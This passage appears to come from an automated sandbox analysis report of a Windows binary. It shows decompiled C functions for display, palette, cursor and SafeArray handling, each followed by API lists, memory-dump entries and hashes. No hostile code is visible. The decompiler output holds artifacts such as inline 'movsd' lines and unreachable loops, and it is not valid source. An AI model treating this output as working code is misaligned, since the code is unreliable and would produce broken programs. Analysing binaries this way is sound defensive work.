					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A9C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x496ab0; // 0x42761c
					 *0x496ab0 = E00427218(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x496ab0(_t27, _t29);
				}
				return _t24;
			}














                                                                        0x00427625
                                                                        0x00427628
                                                                        0x00427632
                                                                        0x00427657
                                                                        0x0042765f
                                                                        0x0042767f
                                                                        0x00427684
                                                                        0x0042768f
                                                                        0x0042769a
                                                                        0x004276a4
                                                                        0x004276a5
                                                                        0x004276a6
                                                                        0x004276a7
                                                                        0x004276a8
                                                                        0x004276a9
                                                                        0x004276b3
                                                                        0x004276b5
                                                                        0x004276bd
                                                                        0x004276be
                                                                        0x004276be
                                                                        0x004276c3
                                                                        0x004276c3
                                                                        0x00427634
                                                                        0x00427639
                                                                        0x00427646
                                                                        0x00427653
                                                                        0x00427653
                                                                        0x004276cd

                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00427674
                                                                        • GetSystemMetrics.USER32 ref: 00427689
                                                                        • GetSystemMetrics.USER32 ref: 00427694
                                                                        • lstrcpy.KERNEL32(?,DISPLAY), ref: 004276BE
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                        • String ID: DISPLAY$GetMonitorInfoA
                                                                        • API String ID: 2545840971-1370492664
                                                                        • Opcode ID: 29cf01dcd43958f641ba807ef5d29dee25e5501a003724a3729d2d1307860ead
                                                                        • Instruction ID: fbb31de7d48d14f86b9486c0f2b6d2713dbdd219238fa15b14bdad62d3ba1336
                                                                        • Opcode Fuzzy Hash: 29cf01dcd43958f641ba807ef5d29dee25e5501a003724a3729d2d1307860ead
                                                                        • Instruction Fuzzy Hash: 0411E731704B215FD3208F75AC48B67B7A9EF06324F50853FED46A7651D374A8008B6C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004276F0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 47%
                                                                        			E004276F0(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x496aca != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A9C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x496ab4; // 0x4276f0
					 *0x496ab4 = E00427218(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x496ab4(_t27, _t29);
				}
				return _t24;
			}














                                                                        0x004276f9
                                                                        0x004276fc
                                                                        0x00427706
                                                                        0x0042772b
                                                                        0x00427733
                                                                        0x00427753
                                                                        0x00427758
                                                                        0x00427763
                                                                        0x0042776e
                                                                        0x00427778
                                                                        0x00427779
                                                                        0x0042777a
                                                                        0x0042777b
                                                                        0x0042777c
                                                                        0x0042777d
                                                                        0x00427787
                                                                        0x00427789
                                                                        0x00427791
                                                                        0x00427792
                                                                        0x00427792
                                                                        0x00427797
                                                                        0x00427797
                                                                        0x00427708
                                                                        0x0042770d
                                                                        0x0042771a
                                                                        0x00427727
                                                                        0x00427727
                                                                        0x004277a1

                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00427748
                                                                        • GetSystemMetrics.USER32 ref: 0042775D
                                                                        • GetSystemMetrics.USER32 ref: 00427768
                                                                        • lstrcpy.KERNEL32(?,DISPLAY), ref: 00427792
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                        • String ID: DISPLAY$GetMonitorInfoW
                                                                        • API String ID: 2545840971-2774842281
                                                                        • Opcode ID: 86a7c240a20f1940e20b11c1b8e177f6ccac7c4339d5c7d8de5956c4a5bb898f
                                                                        • Instruction ID: 831a537686c86f16d1a85402d57f1e65c448198929f9e699794ec6438de5e3da
                                                                        • Opcode Fuzzy Hash: 86a7c240a20f1940e20b11c1b8e177f6ccac7c4339d5c7d8de5956c4a5bb898f
                                                                        • Instruction Fuzzy Hash: AC11E4717057119FD3209F60AC407A7B7E8EB86314F40853BED49A7251D274B8008BAC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004238F0, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E004238F0(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				int _t37;
				intOrPtr _t44;
				void* _t46;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t16 = __eax;
				_t49 = _t51;
				_t52 = _t51 + 0xfffffbf0;
				_v8 = __edx;
				_t46 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L5:
					return _t16;
				} else {
					_t16 = E004212BC(_v8, 0xff,  &_v1044);
					_t37 = _t16;
					if(_t37 == 0) {
						goto L5;
					} else {
						_v12 = GetDC(0);
						_v16 = CreateCompatibleDC(_v12);
						_v20 = SelectObject(_v16, _t46);
						_push(_t49);
						_push(0x42399f);
						_push( *[fs:eax]);
						 *[fs:eax] = _t52;
						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
						_pop(_t44);
						 *[fs:eax] = _t44;
						_push(0x4239a6);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						return ReleaseDC(0, _v12);
					}
				}
			}















                                                                        0x004238f0
                                                                        0x004238f1
                                                                        0x004238f3
                                                                        0x004238fb
                                                                        0x004238fe
                                                                        0x00423902
                                                                        0x004239a6
                                                                        0x004239ab
                                                                        0x00423913
                                                                        0x00423921
                                                                        0x00423926
                                                                        0x0042392a
                                                                        0x00000000
                                                                        0x0042392c
                                                                        0x00423933
                                                                        0x0042393f
                                                                        0x0042394c
                                                                        0x00423951
                                                                        0x00423952
                                                                        0x00423957
                                                                        0x0042395a
                                                                        0x0042396b
                                                                        0x00423972
                                                                        0x00423975
                                                                        0x00423978
                                                                        0x00423985
                                                                        0x0042398e
                                                                        0x0042399e
                                                                        0x0042399e
                                                                        0x0042392a

                                                                        APIs
                                                                          • Part of subcall function 004212BC: GetObjectA.GDI32(00000000,00000004), ref: 004212D3
                                                                          • Part of subcall function 004212BC: GetPaletteEntries.GDI32(00000000,00000000,?,?), ref: 004212F6
                                                                        • GetDC.USER32(00000000), ref: 0042392E
                                                                        • CreateCompatibleDC.GDI32(?), ref: 0042393A
                                                                        • SelectObject.GDI32(?), ref: 00423947
                                                                        • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,0042399F,?,?,?,?,00000000), ref: 0042396B
                                                                        • SelectObject.GDI32(?,?), ref: 00423985
                                                                        • DeleteDC.GDI32(?), ref: 0042398E
                                                                        • ReleaseDC.USER32 ref: 00423999
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                        • String ID:
                                                                        • API String ID: 4046155103-0
                                                                        • Opcode ID: bfb2f096e7f8a1596dd92f3a4f2661b09649afef723ca803cc1e0f0ba574a4f3
                                                                        • Instruction ID: 2b4ad22b928df6106159cc93f20210c2255a60c226f768308a27e69030d134a8
                                                                        • Opcode Fuzzy Hash: bfb2f096e7f8a1596dd92f3a4f2661b09649afef723ca803cc1e0f0ba574a4f3
                                                                        • Instruction Fuzzy Hash: 1B1154B1E042196BDB10EFE9DC41EAEB3FCEB09304F4145AAB514E7381D6789E508759
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004546C4, Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E004546C4(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E0045469C(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E00407298(SendMessageA(_t27, 0x84, 0, E00407328(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}












                                                                        0x004546c4
                                                                        0x004546c4
                                                                        0x004546c8
                                                                        0x004546cb
                                                                        0x004546cd
                                                                        0x004546d3
                                                                        0x00454748
                                                                        0x00454748
                                                                        0x004546d5
                                                                        0x004546d5
                                                                        0x004546dc
                                                                        0x00454738
                                                                        0x00454743
                                                                        0x00000000
                                                                        0x004546de
                                                                        0x004546df
                                                                        0x004546e4
                                                                        0x004546f1
                                                                        0x004546f5
                                                                        0x00000000
                                                                        0x004546f7
                                                                        0x004546fa
                                                                        0x00454708
                                                                        0x00000000
                                                                        0x0045470a
                                                                        0x00454731
                                                                        0x00454731
                                                                        0x00454708
                                                                        0x004546f5
                                                                        0x004546dc
                                                                        0x00454751

                                                                        APIs
                                                                        • GetCursorPos.USER32 ref: 004546DF
                                                                        • WindowFromPoint.USER32(?,?), ref: 004546EC
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004546FA
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454701
                                                                        • SendMessageA.USER32 ref: 0045471A
                                                                        • SendMessageA.USER32 ref: 00454731
                                                                        • SetCursor.USER32(00000000), ref: 00454743
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                        • String ID:
                                                                        • API String ID: 1770779139-0
                                                                        • Opcode ID: 3d56c9a08a5997f3f14bf83b8e0ff9a80a13e3b28eff73a018bfddd4205cad21
                                                                        • Instruction ID: a4fd025c39cd02020c09f08377d953acec842c109d22c87e699394f9229cea46
                                                                        • Opcode Fuzzy Hash: 3d56c9a08a5997f3f14bf83b8e0ff9a80a13e3b28eff73a018bfddd4205cad21
                                                                        • Instruction Fuzzy Hash: 2201B12664430025D62036764C86F7F25A88BDAB5AF11007FB904BE2C3EA3E9C45526E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040C430, Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E0040C430(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed char _t44;
				signed int _t49;
				signed short* _t56;
				char* _t58;
				void* _t64;
				intOrPtr* _t69;
				signed short* _t76;
				signed short* _t79;
				intOrPtr _t88;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr* _t102;
				void* _t106;
				intOrPtr _t107;
				char* _t108;
				void* _t109;

				_v780 = __ecx;
				_v776 = __eax;
				_t44 =  *((intOrPtr*)(__edx));
				_t97 = _t44 & 0x00000fff;
				if((_t44 & 0x00000fff) != 0xc) {
					_push(__edx);
					_t88 = _v776;
					_push(_t88);
					L0040C12C();
					return _t88;
				}
				if((_t44 & 0x00000040) == 0) {
					_v792 =  *((intOrPtr*)(__edx + 8));
				} else {
					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
				}
				_v788 =  *_v792 & 0x0000ffff;
				_t90 = _v788 - 1;
				if(_t90 >= 0) {
					_t94 = _t90 + 1;
					_t106 = 0;
					_t108 =  &_v772;
					do {
						_v804 = _t108;
						_push(_v804 + 4);
						_t16 = _t106 + 1; // 0x1
						_t76 = _v792;
						_push(_t76);
						L0040C154();
						if(_t76 != 0) {
							E004028B0(0x14);
						}
						_push( &_v784);
						_t19 = _t106 + 1; // 0x1
						_t79 = _v792;
						_push(_t79);
						L0040C15C();
						if(_t79 != 0) {
							E004028B0(0x14);
						}
						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
						_t106 = _t106 + 1;
						_t108 = _t108 + 8;
						_t94 = _t94 - 1;
					} while (_t94 != 0);
				}
				_push( &_v772);
				_t49 = _v788;
				_push(_t49);
				_push(0xc);
				L0040C144();
				_t107 = _t49;
				if(_t107 == 0) {
					E004028B0(0x12);
				}
				E0040C2F0(_v776, _t97);
				 *_v776 = 0x200c;
				 *((intOrPtr*)(_v776 + 8)) = _t107;
				_t92 = _v788 - 1;
				if(_t92 >= 0) {
					_t93 = _t92 + 1;
					_t69 =  &_v768;
					_t102 =  &_v260;
					do {
						 *_t102 =  *_t69;
						_t102 = _t102 + 4;
						_t69 = _t69 + 8;
						_t93 = _t93 - 1;
					} while (_t93 != 0);
					do {
						goto L17;
					} while (_t64 != 0);
					return _t64;
				}
				L17:
				_push( &_v796);
				_push( &_v260);
				_t56 = _v792;
				_push(_t56);
				L0040C174();
				if(_t56 != 0) {
					E004028B0(0x14);
				}
				_push( &_v800);
				_t58 =  &_v260;
				_push(_t58);
				_push(_t107);
				L0040C174();
				if(_t58 != 0) {
					E004028B0(0x14);
				}
				_v780();
				_t64 = E0040C3D4(_v788 - 1, _t109);
			}
































                                                                        0x0040c43c
                                                                        0x0040c442
                                                                        0x0040c448
                                                                        0x0040c44d
                                                                        0x0040c456
                                                                        0x0040c458
                                                                        0x0040c459
                                                                        0x0040c45f
                                                                        0x0040c460
                                                                        0x00000000
                                                                        0x0040c460
                                                                        0x0040c46d
                                                                        0x0040c47f
                                                                        0x0040c46f
                                                                        0x0040c474
                                                                        0x0040c474
                                                                        0x0040c48e
                                                                        0x0040c49a
                                                                        0x0040c49d
                                                                        0x0040c49f
                                                                        0x0040c4a0
                                                                        0x0040c4a2
                                                                        0x0040c4a8
                                                                        0x0040c4aa
                                                                        0x0040c4b9
                                                                        0x0040c4ba
                                                                        0x0040c4be
                                                                        0x0040c4c4
                                                                        0x0040c4c5
                                                                        0x0040c4cc
                                                                        0x0040c4d0
                                                                        0x0040c4d0
                                                                        0x0040c4db
                                                                        0x0040c4dc
                                                                        0x0040c4e0
                                                                        0x0040c4e6
                                                                        0x0040c4e7
                                                                        0x0040c4ee
                                                                        0x0040c4f2
                                                                        0x0040c4f2
                                                                        0x0040c50d
                                                                        0x0040c50f
                                                                        0x0040c510
                                                                        0x0040c513
                                                                        0x0040c513
                                                                        0x0040c4a8
                                                                        0x0040c51c
                                                                        0x0040c51d
                                                                        0x0040c523
                                                                        0x0040c524
                                                                        0x0040c526
                                                                        0x0040c52b
                                                                        0x0040c52f
                                                                        0x0040c533
                                                                        0x0040c533
                                                                        0x0040c53e
                                                                        0x0040c549
                                                                        0x0040c554
                                                                        0x0040c55d
                                                                        0x0040c560
                                                                        0x0040c562
                                                                        0x0040c563
                                                                        0x0040c569
                                                                        0x0040c56f
                                                                        0x0040c571
                                                                        0x0040c573
                                                                        0x0040c576
                                                                        0x0040c579
                                                                        0x0040c579
                                                                        0x0040c57c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c5ec
                                                                        0x0040c5ec
                                                                        0x0040c57c
                                                                        0x0040c582
                                                                        0x0040c589
                                                                        0x0040c58a
                                                                        0x0040c590
                                                                        0x0040c591
                                                                        0x0040c598
                                                                        0x0040c59c
                                                                        0x0040c59c
                                                                        0x0040c5a7
                                                                        0x0040c5a8
                                                                        0x0040c5ae
                                                                        0x0040c5af
                                                                        0x0040c5b0
                                                                        0x0040c5b7
                                                                        0x0040c5bb
                                                                        0x0040c5bb
                                                                        0x0040c5ce
                                                                        0x0040c5dc

                                                                        APIs
                                                                        • VariantCopy.OLEAUT32(?), ref: 0040C460
                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C4C5
                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C4E7
                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C526
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C591
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C5B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                        • String ID:
                                                                        • API String ID: 351091851-0
                                                                        • Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                        • Instruction ID: 91eb53b407ec2d2dd2796e8a100e52e0f4196e31d9e17e27235ea4b964657383
                                                                        • Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                        • Instruction Fuzzy Hash: 7851EF75901529DBDB22DB59CD90ADAB3BCBF48304F0042FAE509E7352D674AF818F64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421568, Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 81%
                                                                        			E00421568(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				struct HDC__* _v44;
				signed int* _t36;
				signed int _t39;
				signed int _t42;
				signed int* _t52;
				signed int _t56;
				intOrPtr _t66;
				void* _t72;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t73 = _t74;
				_t75 = _t74 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t52 = _a8;
				_v24 = _v16 << 4;
				_v20 = E004083E8(_v24, __eflags);
				 *[fs:edx] = _t75;
				_t56 = _v24;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:edx], 0x42185f, _t73, __edi, __esi, __ebx, _t72);
				if(( *_t52 | _t52[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t52;
					_t36[1] = _t52[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_a4[1] = GetSystemMetrics(0xc);
				}
				_v44 = GetDC(0);
				if(_v44 == 0) {
					E00420A2C(_t56);
				}
				_push(_t73);
				_push(0x421651);
				_push( *[fs:edx]);
				 *[fs:edx] = _t75;
				_t39 = GetDeviceCaps(_v44, 0xe);
				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
				if(_t42 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t42;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(E00421658);
				return ReleaseDC(0, _v44);
			}




















                                                                        0x00421569
                                                                        0x0042156b
                                                                        0x00421571
                                                                        0x00421574
                                                                        0x00421577
                                                                        0x0042157a
                                                                        0x00421583
                                                                        0x0042158e
                                                                        0x0042159c
                                                                        0x004215a2
                                                                        0x004215aa
                                                                        0x004215b2
                                                                        0x004215cf
                                                                        0x004215d4
                                                                        0x004215d9
                                                                        0x004215b4
                                                                        0x004215be
                                                                        0x004215ca
                                                                        0x004215ca
                                                                        0x004215e3
                                                                        0x004215ea
                                                                        0x004215ec
                                                                        0x004215ec
                                                                        0x004215f3
                                                                        0x004215f4
                                                                        0x004215f9
                                                                        0x004215fc
                                                                        0x00421605
                                                                        0x0042161b
                                                                        0x00421621
                                                                        0x00421633
                                                                        0x00421635
                                                                        0x00421623
                                                                        0x00421623
                                                                        0x00421623
                                                                        0x0042163a
                                                                        0x0042163d
                                                                        0x00421640
                                                                        0x00421650

                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 004215B6
                                                                        • GetSystemMetrics.USER32 ref: 004215C2
                                                                        • GetDC.USER32(00000000), ref: 004215DE
                                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00421605
                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00421612
                                                                        • ReleaseDC.USER32 ref: 0042164B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CapsDeviceMetricsSystem$Release
                                                                        • String ID:
                                                                        • API String ID: 447804332-0
                                                                        • Opcode ID: d1eb4b26aebf92080a74f6cc0787259d8db2efac78c55e80a3cbf10a8e3eebe9
                                                                        • Instruction ID: 1df3673ef4671481c0cb97d4e5fb4c97dc3887fd9bb6d5ee2f2f7d792188f36b
                                                                        • Opcode Fuzzy Hash: d1eb4b26aebf92080a74f6cc0787259d8db2efac78c55e80a3cbf10a8e3eebe9
                                                                        • Instruction Fuzzy Hash: F2317374B00218EFDB00DF65C881AAEBBF5FB89710F50816AF915AB395C6389D41CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004219D8, Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E004219D8(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HPALETTE__* _v12;
				struct HDC__* _v16;
				struct tagBITMAPINFO* _t36;
				intOrPtr _t43;
				struct HBITMAP__* _t47;
				void* _t50;

				_t36 = __ecx;
				_t47 = __eax;
				E00421888(__eax, _a4, __ecx);
				_v12 = 0;
				_v16 = CreateCompatibleDC(0);
				_push(_t50);
				_push(0x421a75);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if(__edx != 0) {
					_v12 = SelectPalette(_v16, __edx, 0);
					RealizePalette(_v16);
				}
				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(E00421A7C);
				if(_v12 != 0) {
					SelectPalette(_v16, _v12, 0);
				}
				return DeleteDC(_v16);
			}










                                                                        0x004219e1
                                                                        0x004219e5
                                                                        0x004219ee
                                                                        0x004219f5
                                                                        0x004219ff
                                                                        0x00421a04
                                                                        0x00421a05
                                                                        0x00421a0a
                                                                        0x00421a0d
                                                                        0x00421a12
                                                                        0x00421a20
                                                                        0x00421a27
                                                                        0x00421a27
                                                                        0x00421a45
                                                                        0x00421a4b
                                                                        0x00421a4e
                                                                        0x00421a51
                                                                        0x00421a5a
                                                                        0x00421a66
                                                                        0x00421a66
                                                                        0x00421a74

                                                                        APIs
                                                                          • Part of subcall function 00421888: GetObjectA.GDI32(?,00000054), ref: 0042189C
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004219FA
                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 00421A1B
                                                                        • RealizePalette.GDI32(?), ref: 00421A27
                                                                        • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00421A3E
                                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 00421A66
                                                                        • DeleteDC.GDI32(?), ref: 00421A6F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
